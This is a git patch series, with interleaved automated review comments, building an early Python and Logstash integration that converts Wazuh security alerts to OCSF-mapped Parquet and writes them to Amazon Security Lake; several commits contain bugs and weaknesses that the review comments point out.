From e6784f352b56e82e945cee5643dfe49157f6f04e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:47:23 -0300 Subject: [PATCH 01/77] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake --- integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 integrations/stdin_to_securitylake.py diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py new file mode 100755 index 0000000000000..fd70e41906ccb --- /dev/null +++ b/integrations/stdin_to_securitylake.py 
@@ -0,0 +1,86 @@ +#!/usr/bin/env python3 + +import os +import sys +import argparse +import logging +import time +from datetime import datetime +from pyarrow import json +import pyarrow.parquet as pq + +def encode_parquet(json_list): + for json in json_list: + ### read_json is meant for files, need to change it to read from a string + ### https://arrow.apache.org/docs/python/json.html + table = json.read_json(json) + pq.write_table(table, 'parquet/output.parquet') + +def push_to_s3(parquet): + ## Fill with AWS S3 code + pass + +def read_chunk(fileobject,length): + output=[] + for i in range(0,length): + line = fileobject.readline() + if line is '': + output.append(line) + break + output.append(line) + return output + +def get_elapsedtime(reference_timestamp): + current_time = datetime.now(tz='UTC') + return (current_time - reference_timestamp).total_seconds() + +if __name__ == "__main__": + + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H:%M:%S') + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + + parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') + + debugging = parser.add_argument_group('debugging') + debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') + debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.debug("Running main()") + logging.debug("Current time is " + str(clockstr) ) + + try: + 
logging.info('BUFFERING STDIN') + + with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + + output_buffer = [] + + starttimestamp = datetime.now(tz='UTC') + + try: + while True: + output_buffer.append(read_chunk(stdin,args.linebuffer)) + if output_buffer[len(output_buffer)-1] is '': + time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: + encode_parquet(output_buffer) + logging.debug(output_buffer) + starttimestamp = datetime.now(tz='UTC') + output_buffer = [] + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + + + logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: + logging.error("Error running script") + exit(1) From 116b22bfbe383588aa646d5c9d81e44173772b63 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:50:39 -0300 Subject: [PATCH 02/77] Adding logstash pipeline for python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} 
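Review bot: The four `add_argument` calls in the `__main__` block are missing the comma between `default=10` and `help=...`, so this file does not parse at all; once that is fixed, `datetime.now(tz='UTC')` raises because `tz` must be a `tzinfo` (use `datetime.now(timezone.utc)`), `os.fdopen(sys.stdin.fileno(), 'rt', buffering=0)` rejects unbuffered text mode, and `if line is '':` compares identity rather than equality. The outer handler discards the exception it catches, leaving only `Error running script` in the log; `logging.exception("Error running script")` keeps the traceback. `basicConfig` is called with `level=logging.DEBUG` regardless of `--debug`, and `logging.debug(output_buffer)` writes every buffered alert into a file whose default name under `/tmp` is predictable, so alert contents end up in a shared, world-readable directory; gate the level on `args.debug` and default the log to a directory with restricted permissions.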
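Review bot: `stdout { codec => rubydebug }` in the output block echoes every alert pulled from the indexer into Logstash's own stdout/log, so it should be removed or gated before this pipeline runs outside a lab. `ttl => "10"` appears to make Logstash restart the pipe command every ten seconds, while the script it launches only flushes on its own line-count or 299-second interval, so events still buffered in the child may be lost on each restart; confirm against the script's end-of-input handling before relying on it. The `range` query with `"gt": "now-1m"` on a `* * * * *` schedule has no overlap margin, so events indexed near the window edge may be duplicated or skipped depending on scheduler jitter.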
From 288c40a6507b8372e828a68859d1f3e94cc1d271 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 03/77] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code 
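Review bot: `encode_parquet` writes to `'/tmp/{}.parquet'.format(clockstr)`, a predictable name in a shared world-writable directory, so alert data lands where any local user can read it or pre-create the path; until the S3 write exists, write under a dedicated directory with restricted permissions (e.g. from `tempfile.mkdtemp()`). The parameter named `list` shadows the builtin; `def encode_parquet(alerts):` reads better and avoids surprises later in the function. `clockstr` is read as a module global that is only assigned inside the `__main__` block, which works for the CLI but will `NameError` if the function is ever imported and called from elsewhere.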
@@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - 
logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From 6ac3c999f9ff79bbdd48228e9527d158e20d45ca Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 04/77] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
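Review bot: `parse_arguments()` builds `parser` and calls `parser.parse_args()` into a local `args` but never returns it, so `args.output` in the `__main__` block raises `NameError` before the pipeline starts; end the function with `return args` and call it as `args = parse_arguments()`. The missing comma before `help=` in the four `add_argument` calls is still present in this hunk, so the file still fails to parse. The `__main__` block continues outside the hunk.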
@@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 4ad01c2bd9eba6f9c99ba03b8b65f31dbae7ae62 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 05/77] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output 
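Review bot: `def map_to_ocsf():` in the second patch on this line now has a body consisting only of a comment, which Python rejects as an indentation error, so the module cannot be imported or run until a statement is added; `pass` or `raise NotImplementedError` as the body keeps the placeholder valid. The rename from `chunk_ending` to `block_ending` is fine, but the sentinel is a plain dict compared with `==`, so an alert whose whole body happened to equal `{"block_ending": True}` would (however unlikely) be treated as end of input; a private `object()` sentinel compared with `is` avoids that class of confusion.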
@@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1638b171fb34089f9f657f4848228cf8786b34e9 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 06/77] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): 
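Review bot: `output_buffer.append(current_block)` at the end of the loop body appends the whole block as one nested element, so `Table.from_pylist(output_buffer)` receives a list of lists rather than a list of dicts and `len(output_buffer) > args.maxlength` counts blocks instead of events; use `output_buffer.extend(current_block)`. On the end-of-input branch the events before the sentinel are already added with `+=`, and then the same block, sentinel included, is appended again after the sleep, so those events are duplicated and the `block_ending` dict ends up in the Parquet output; `continue` after the sleep, or put the append in an `else:` branch of that `if`. The loop continues outside the hunk.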
@@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From 17e5dfb2d1026e86edba18a39e69ad69045b5157 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 07/77] Add s3 handling reference links --- integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
@@ -7,16 +7,19 @@ import time import json from datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 0b5adc943fa030eff6c5a45bbce2cf168dcbffea Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 08/77] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] 
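Review bot: `parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder))` never passes the module-level `s3` filesystem, so the `S3FileSystem(region='eu-west-3')` built on import is unused and the write goes through pyarrow's URI auto-detection with whatever region and credentials it resolves by default; pass `filesystem=s3` with a plain `bucket/folder` path, or drop the global. Constructing `s3` at import time also makes the module unusable without AWS configuration, even for a unit test of `map_to_ocsf`; create it inside `encode_parquet` or lazily. `bucket_name` and `folder` are interpolated unchecked, so a missing `-b`/`-f` produces the literal path `s3://None/None`.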
@@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') 
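Review bot: The numeric options (`--pushinterval`, `--maxlength`, `--linebuffer`, `--sleeptime`) have integer defaults but no `type=int`, so any value given on the command line arrives as a `str` and `range(0, length)`, `time.sleep(args.sleeptime)` and the `>` comparisons in the main loop raise `TypeError`; add `type=int` to each. `--bucketname` and `--foldername` have no default and are not `required=True`, so the script starts and only fails at the first push with `None` in the S3 path.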
@@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From 10824ed171977bee3ad97c4fa6b11bf4e2027b60 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 09/77] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json 
@@ -0,0 +1,42 @@
+{
+ "constants":
+ {
+ "activity_id" : 1,
+ "analytic.type" : "Rule",
+ "analytic.type_id" : 1,
+ "attacks.version" : "v13.1",
+ "category_name" : "Findings",
+ "category_uid" : 2,
+ "class_name" : "Security Finding",
+ "class_uid" : 2001,
+ "metadata.log_name" : "Security events",
+ "metadata.log_provider" : "Wazuh",
+ "metadata.product.lang" : "en",
+ "metadata.product.name" : "Wazuh",
+ "metadata.product.vendor_name" : "Wazuh, Inc.",
+ "metadata.product.version" : "4.9.0",
+ "state_id" : 99,
+ "type_uid" : 200101
+ },
+ "mappings":
+ {
+ "analytic.category" : "rule.groups",
+ "analytic.name" : "decoder.name",
+ "analytic.uid" : "rule.id",
+ "attacks.tactics" : "rule.mitre.tactic",
+ "attacks.technique" : "rule.mitre.technique",
+ "count" : "rule.firedtimes",
+ "data_sources" : ["_index", "location", "manager.name"],
+ "finding.title" : "rule.description",
+ "finding.type" : "input.type",
+ "finding.uid" : "id",
+ "message" : "rule.description",
+ "nist" : "rule.nist_800_53",
+ "raw_data" : "full_log",
+ "resources.name" : "agent.name",
+ "resources.uid" : "agent.id",
+ "risk_score" : "rule.level",
+ "severity_id" : "rule.level",
+ "time" : "timestamp"
+ }
+}
diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 2b8a1de14755b..d125a2ff6d56b 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
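Review bot: `"severity_id" : "rule.level"` copies the Wazuh rule level straight into a field that the converter added later in this series describes as needing normalisation into the 0–6 range required by OCSF, and `"risk_score"` receives the same raw value, so at least one of the two needs a translation step rather than a plain field copy. `"metadata.product.version" : "4.9.0"` is pinned here although the events themselves do not carry a product version. `"data_sources"` is the only mapping whose value is a list; the consumer in `stdin_to_securitylake.py` calls `.split('.')` on every mapping value, so this entry needs either list handling on the Python side or three separate keys.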
@@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) 
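Review bot: `map_to_ocsf` cannot run as written: `depth_levels = dotted_destination.split('.')` references a name that does not exist (the variable is `dotted_destination_field`), `if len(depth_levels>1):` compares a list with an int before calling `len`, and the function builds `ocsf_alert` but never returns it. It also reopens and re-parses the mapping file on every alert, raises `KeyError` for any alert that lacks a mapped field (`rule.mitre`, for instance, is not present on every rule), and breaks on the `data_sources` entry whose value is a list. The rewrite below loads the file once per call, walks each dotted path defensively (absent fields become `None` — confirm that is acceptable for the Security Lake schema) and returns the result; caching `mappings` across alerts belongs in the caller, which is outside this hunk.
```python
def map_to_ocsf(alert_dictionary,ocsf_mapping_filename):
    ocsf_alert = {}
    with open(ocsf_mapping_filename) as jsonfile:
        mappings = json.load(jsonfile)
    ### Put constants into the output alert
    ocsf_alert |= mappings['constants']

    for key, source_path in mappings['mappings'].items():
        # A list value (data_sources) names several source fields
        paths = source_path if isinstance(source_path, list) else [source_path]
        values = []
        for dotted in paths:
            current_level = alert_dictionary
            for field in dotted.split('.'):
                if not isinstance(current_level, dict) or field not in current_level:
                    current_level = None  # field absent on this alert
                    break
                current_level = current_level[field]
            values.append(current_level)
        ocsf_alert[key] = values if isinstance(source_path, list) else values[0]
    return ocsf_alert
```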
@@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From c81239b48a50880809002469f36dd94a49f72300 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 10/77] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 210541d07434bb5db9d5ce3ed8cc1d5ab612d4f0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 11/77] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) 
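Review bot: `default='ocsf-mapping.json'` for `--mapping` is resolved against the current working directory, which for a process launched by the Logstash `pipe` output is wherever Logstash was started, so the default will usually not find the file that lives next to the script; `default=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ocsf-mapping.json')` makes it location-independent. Because the file's contents decide which alert fields are copied into the output, the help text should also say it is expected to be a locally maintained file.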
diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): 
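Review bot: In the first hunk `map_to_ocsf(alert_dictionary, mappings, ocsf_output)` immediately rebinds `ocsf_output = {}`, so the caller's dict is never touched and every mapped alert appended in `map_block` stays `{}`; either drop the rebinding and fill the passed dict in place, or return the dict and assign it at the call site. In the third hunk the call `map_to_ocsf(alert, mappings, ocsf_mapped_alert):` has a trailing colon, which is a syntax error. `for line in range(0, length):` still reuses `line` as both loop counter and the read result; `for _ in range(length):` avoids the confusion.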
